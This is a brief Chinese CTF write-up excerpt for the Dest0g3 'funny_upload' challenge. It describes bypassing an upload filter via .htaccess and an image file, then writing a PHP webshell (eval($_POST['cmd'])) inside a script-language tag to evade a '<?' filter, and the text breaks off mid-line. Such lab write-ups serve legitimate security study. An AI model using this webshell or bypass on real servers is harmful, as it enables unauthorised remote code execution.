网站首页
编程语言
数据库
系统相关
其他分享
编程问答
Dest0g3
2024-09-16
[Dest0g3 520迎新赛]funny_upload
打开靶机抓包发现过滤代码发现.htaccess能上传后传入图片马发现内容对<?进行过滤我们换一种方式写后门代码<scriptlanguage="php">eval($_POST['cmd']);</script>写入成功后发现没有回显查资料发现可能使由于php版本过高不支持<scriptlanguage="php">eval($_POST['cm